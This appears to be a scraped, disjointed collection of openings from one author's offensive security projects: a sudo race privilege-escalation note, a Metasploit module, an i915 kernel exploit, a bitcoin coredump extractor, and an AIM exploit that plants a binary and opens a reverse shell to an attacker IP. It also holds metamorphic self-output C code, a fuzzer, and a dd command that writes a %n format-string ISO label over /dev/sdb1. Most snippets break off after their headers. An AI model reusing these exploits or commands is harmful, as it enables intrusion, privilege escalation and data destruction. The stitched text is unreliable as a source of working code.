root@debian-sid-testbed:/home/marshall/ansvif# useradd '#0' | |
root@debian-sid-testbed:/home/marshall/ansvif# cat /etc/passwd | |
root:x:0:0:root:/root:/bin/bash | |
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin | |
bin:x:2:2:bin:/bin:/usr/sbin/nologin | |
sys:x:3:3:sys:/dev:/usr/sbin/nologin | |
sync:x:4:65534:sync:/bin:/bin/sync | |
games:x:5:60:games:/usr/games:/usr/sbin/nologin | |
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin | |
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin |
# oxagast / Marshall Whittaker | |
# | |
# The echo line uses sudoers file format to allow everyone to | |
# use the root account and writes it to proc/23423/fd/3 (where | |
# the number is sudo's process). If you have write access to file | |
# descriptor 3 it gives you root! | |
# Caveats: sudo must be running and asking for a password at the time, | |
# and you must have write permission to 3. | |
# | |
# Race condition between when getting the uid of sudo and the |
## | |
# This module requires Metasploit: https://metasploit.com/download | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
require 'msf/base/sessions/scriptable' | |
require 'msf/base' | |
class MetasploitModule < Msf::Auxiliary | |
include Msf::Exploit::Remote::Tcp | |
include Msf::Auxiliary::Report |
#!/bin/bash | |
# | |
# ./makeitrain.sh bitcoin-qt.crashdump.core | |
# __ _ _ __ ___ __ ____ ____ | |
# / ( \/ )/ _\ / __)/ _\/ ___(_ ) | |
# ( O ) (/ ( (_ / \___ \ )( | |
# \__(_/\_\_/\_/\___\_/\_(____/(__) | |
# | |
# Donations: | |
# btc: 34fDhMUkvGVr1s2jQvhwmBfw1xqjstrLed |
#!/usr/bin/perl | |
use strict; | |
use Cwd qw(); | |
my $path = Cwd::cwd(); | |
if ( $path !~ m/metasploit/ ) { | |
print("err: Your current working directory must be metasploit's.\n"); | |
exit(1); | |
} | |
print("autopreter by oxagast\n"); | |
if ( $#ARGV < 1 ) { |
# Build an ISO9660 image of /etc/passwd whose volume label (-V) is the
# 8-character placeholder AAAAAAAA. Only if that succeeds, stream the image
# through sed, replacing every occurrence of the placeholder with the
# 8-character string %n%n%n%n, and write the result to /dev/sdb1.
# Both strings are the same length, so the substitution does not shift any
# byte offsets inside the image.
# NOTE(review): %n is a printf-style conversion, so this looks like a
# format-string test label for software that reads the volume name; nothing
# on this line names the consumer, so confirm before relying on that reading.
# Code that displays or logs a volume label should pass it as data, never as
# the format argument.
# The final dd overwrites whatever is on /dev/sdb1, and the /g substitution
# also rewrites any AAAAAAAA run in the file data, not only the label.
genisoimage -V "AAAAAAAA" -o dos.iso /etc/passwd \
    && dd if=dos.iso \
    | sed -e 's/AAAAAAAA/%n%n%n%n/g' \
    | dd of=/dev/sdb1
/* */ | |
/* gcc drm_i915_ktsploit.c -o kt -ldrm -I/usr/include/libdrm */ | |
/* exploit by oxagast */ | |
/* */ | |
//Jun 17 01:22:05 likon kernel: [ 1788.600973] BUG: unable to handle kernel NULL pointer dereference at 0000000000000010 | |
//Jun 17 01:22:05 likon kernel: [ 1788.600982] IP: __sg_alloc_table_from_pages+0xe4/0x1f0 | |
//Jun 17 01:22:05 likon kernel: [ 1788.600984] PGD 0 P4D 0 | |
//Jun 17 01:22:05 likon kernel: [ 1788.600987] Oops: 0000 [#3] SMP PTI | |
//Jun 17 01:22:05 likon kernel: [ 1788.600988] Modules linked in: rfcomm appletalk ipx p8023 psnap p8022 llc pci_stub vboxpci(OE) vboxnetadp(OE) vboxnetflt(OE) vboxdrv(OE) snd_hrtimer ccm cmac bnep binfmt_misc arc4 iwlmvm mac80211 hid_multitouch hid_sensor_magn_3d hid_sensor_accel_3d hid_sensor_rotation hid_sensor_incl_3d hid_sensor_als ir_lirc_codec lirc_dev hid_sensor_gyro_3d rtl2832_sdr hid_sensor_trigger industrialio_t |
#!/bin/bash | |
### AOL Instant Messenger 8.0.1.5 (Jul 2013) Exploit Windows XP/7 tested and working. | |
### Leverages binary file planting to My Documents via AIM's advertisement code. | |
### A little social engineering is built in, using JavaScript to try to get them to run the AIM_Install.exe. | |
### Starts a reverse shell back to your handler on 192.168.2.5:443 by default. | |
### Marshall Whittaker | |
ATTACKER="192.168.2.10"; |
#define __NULLHOLDER | |
#define __START | |
/* oxagast */ | |
/* self output metamorphic c code */ | |
/* gcc myself.c -o me && cat myself.c >> me */ | |
/* ./me && md5sum ./me && sleep 1 && ./me && md5sum ./me */ | |
/* d4c6f41bace586e876f31d8d5032bd2e ./me */ | |
/* 9c80c85a49721a1700e0ac2f594bbf86 ./me */ | |
#include <stdio.h> | |
#include <stdlib.h> |
# bermise_fuzz | |
# oxagast | |
mupr="64"; | |
syslog_crashes=$(grep "traps:\|segfault" /var/log/syslog -c); | |
binname="$1"; | |
binshort=$(echo $binname | awk -F "/" '{print $NF}') | |
echo fuzzing $binname; | |
randchars=1; |